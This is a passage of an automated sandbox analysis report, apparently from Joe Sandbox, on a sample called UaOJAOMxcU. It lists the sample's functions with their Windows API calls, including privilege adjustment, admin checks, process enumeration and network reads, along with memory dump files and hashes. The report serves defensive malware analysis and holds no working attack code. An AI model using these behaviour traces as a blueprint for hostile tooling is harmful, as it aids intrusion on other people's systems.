                    • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                    • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                    • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    • API String ID: 99427753-0
                    • Opcode ID: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                    • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                    • Opcode Fuzzy Hash: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                    • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                    Function 00485376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                    • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                    • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                    • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                    Function 004580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                    • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                    • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                    • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                    Function 0046C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0046C432
                    • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                    • CoUninitialize.OLE32 ref: 0046C6B7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CreateInitializeInstanceUninitialize_memmove
                    • String ID: .lnk
                    • API String ID: 2683427295-24824748
                    • Opcode ID: 8be31365239305a4f0ecbc96338834b64287ccbcc385a5ffb8382792e3c7b4fb
                    • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                    • Opcode Fuzzy Hash: 8be31365239305a4f0ecbc96338834b64287ccbcc385a5ffb8382792e3c7b4fb
                    • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                    Function 00404B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                    • Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
                    • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                    • Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
                    Function 0047EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                    • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                    • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    • API String ID: 2576544623-0
                    • Opcode ID: 1c9346bdc20ddc0196d8a7451d6206e56d34d46406b44e9c87b55d7262c0256e
                    • Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
                    • Opcode Fuzzy Hash: 1c9346bdc20ddc0196d8a7451d6206e56d34d46406b44e9c87b55d7262c0256e
                    • Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96
                    Function 0045E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    • Opcode ID: eef32c7583b458a7172a6c711d1ec7a4f2f7e3610f1f932fb94fc73443e575d2
                    • Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
                    • Opcode Fuzzy Hash: eef32c7583b458a7172a6c711d1ec7a4f2f7e3610f1f932fb94fc73443e575d2
                    • Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44
                    Function 004722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    • Opcode ID: f5373d92f6f0dc30811b4af31ba5f0bb4595b0a53436f4c0864762cea70d04c2
                    • Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
                    • Opcode Fuzzy Hash: f5373d92f6f0dc30811b4af31ba5f0bb4595b0a53436f4c0864762cea70d04c2
                    • Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658
                    Function 0046B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                    • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                    • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                    • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                    Function 004587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                      • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                    • GetLastError.KERNEL32 ref: 00458865
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    • Opcode ID: 11fd776744e65cad2fb0d65c8c6b7c288e777bf7a622f9fe62c50e0e4f52890d
                    • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                    • Opcode Fuzzy Hash: 11fd776744e65cad2fb0d65c8c6b7c288e777bf7a622f9fe62c50e0e4f52890d
                    • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                    Function 0045874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                    Download Yara Rule
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                    • FreeSid.ADVAPI32(?), ref: 0045879B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                    • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                    • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                    • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                    Function 00468889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    • __time64.LIBCMT ref: 0046889B
                      • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                      • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID: 0eL
                    • API String ID: 2893107130-3167399643
                    • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                    • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                    • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                    • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                    Function 0046C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                    • FindClose.KERNEL32(00000000), ref: 0046C72B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                    • Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
                    • Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                    • Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
                    Function 0046A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: 472a7cd9639d892b3363a091e7d83c08bd9bcb7ed13b50b01156cac8ad95666a
                    • Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
                    • Opcode Fuzzy Hash: 472a7cd9639d892b3363a091e7d83c08bd9bcb7ed13b50b01156cac8ad95666a
                    • Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
                    Function 004581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                    • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    • Opcode ID: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                    • Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
                    • Opcode Fuzzy Hash: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                    • Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
                    Function 0042A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
